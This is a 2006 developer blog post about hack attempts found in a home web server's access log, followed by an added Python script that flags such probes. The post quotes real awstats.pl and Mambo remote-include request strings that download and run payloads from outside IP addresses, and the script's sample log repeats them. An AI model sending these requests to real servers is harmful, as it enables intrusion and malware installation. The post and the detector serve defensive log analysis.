a php developer weblog

calin view of the web development world

2006/2/19

access.log analysis: hackers all around

@ 02:52 PM
I recently announced the movies worth seeing database, an imdb.com gateway website that I host on one of my home computers. Since I have full access to the access.log of this website, it was interesting to see how the traffic developed over the last couple of days since I announced its launch. First of all, since I referenced this website only on my blog, a few of my blog readers visited this fresh new website, some of them with pretty long visits. Then some indexing robots came around, noticing the new website, issuing HEAD requests and then reading robots.txt. This is regular web behaviour. However, a few hours later, some strange requests made their way into the access.log. First, some hack attempts from a Dallas, Texas internet provider, desperately requesting some awstats.pl hack (GET url split in 3 lines):

/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3b
wget%20211%2e234%2e113%2e241%2fscripz%3b
chmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|

This sad hacker didn't even try to see if awstats is installed on the website, so his attack was blind and foolish. The next requests tried to find the presence of some xmlrpc.php script and simulate a POST request to it; this script is most likely used often by WordPress and other blog software, and opens a trojan doorway for this kind of visitor. In the next few days I will create a script with that name and intercept the POST attack in its entirety.

Next some regular visitors came around, some from Microsoft Corp., going deep inside the website and getting the feel of it. Then again, 2 days later, some sad hackers from Lima, Peru, trying to find their way in through awstats again. This guy was a little smarter: he first tried to guess the path to awstats, and tried quite a bit to get it, maybe 50 frequently used paths. Again, I should have a dummy script there, just to catch the hack attempt and expose it here.

A few hours later, other strange requests arrived, first from Poland, then from Wister, Oklahoma, and last from Toronto, Canada, all requesting the very same thing:

/index2.php?option=com_content&do_pdf=1&id=1index2.php?
_REQUEST[option]=com_content&_REQUEST[Itemid]=1&
GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&
cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo|

They all seem to be hacked computers spreading further some fresh new Mambo virus, hosted somewhere in Taiwan on some Sony Network Ltd computer.

A few hours later again, phpgroupware, drupal and wordpress hack attempts. So far, that's all the access.log shows. Bottom line: besides regular web visitors, there is really a lot of pollution out there. Many of these zombie, remotely-controlled computers try to find their way into your website as soon as you launch it.
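As an added example (not from the original post), here is a small Python checker that reads Apache combined-format access.log lines, URL-decodes the request and flags the kinds of probes described above: the awstats.pl configdir pipe, the Mambo mosConfig_absolute_path remote include, shell commands smuggled into a query string, and xmlrpc.php probes. The sample log lines are constructed, using documentation IP addresses rather than the real ones from the post.

```python
import re
from urllib.parse import unquote

# Apache combined log format: ip - - [time] "METHOD path PROTO" status size "referer" "ua"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Indicators modelled on the probes in the post; applied to the URL-decoded request.
# The shell-command pattern requires a separator and an argument so that a word
# like "wget" inside an ordinary search term does not trigger a false positive.
INDICATORS = [
    ("awstats configdir injection", re.compile(r"awstats\.pl\?.*configdir=\|")),
    ("mambo mosConfig_absolute_path RFI", re.compile(r"mosConfig_absolute_path=https?://")),
    ("shell commands in query string",
     re.compile(r"(?:^|;|\||&&|\?|=)\s*(?:cd\s+/tmp|wget\s+\S+|chmod\s+\S+)")),
    ("xmlrpc.php probe", re.compile(r"/xmlrpc\.php(?:\?|$)")),
]

def analyse(lines):
    """Return one (ip, method, decoded_path, reasons) tuple per suspicious line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line, skip it
        decoded = unquote(m["path"])      # %20 -> space, %2f -> /, %3b -> ;
        reasons = [name for name, rx in INDICATORS if rx.search(decoded)]
        if reasons:
            hits.append((m["ip"], m["method"], decoded, reasons))
    return hits

# Constructed sample lines (hypothetical; 192.0.2.x / 198.51.100.x / 203.0.113.x are documentation ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [19/Feb/2006:10:01:02 +0200] "GET /robots.txt HTTP/1.0" 200 52 "-" "Googlebot/2.1"
198.51.100.7 - - [19/Feb/2006:14:22:09 +0200] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20192.0.2.99%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.0" 404 291 "-" "Mozilla/4.0"
203.0.113.5 - - [19/Feb/2006:15:40:33 +0200] "POST /xmlrpc.php HTTP/1.1" 404 291 "-" "Mozilla/5.0"
203.0.113.8 - - [21/Feb/2006:03:12:44 +0200] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://192.0.2.99/cmd.gif?&cmd=cd%20/tmp;wget%20192.0.2.99/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.0" 404 291 "-" "Mozilla/4.0"
192.0.2.11 - - [21/Feb/2006:09:00:00 +0200] "GET /movies/?title=the+wget+story HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, method, path, reasons in analyse(SAMPLE_LOG.splitlines()):
        print(ip, method, path[:60], reasons)
```

Piping a live log through the same function (for example from `tail -f`) gives the early warning the post wishes for; the last sample line shows a benign search term that must not be flagged.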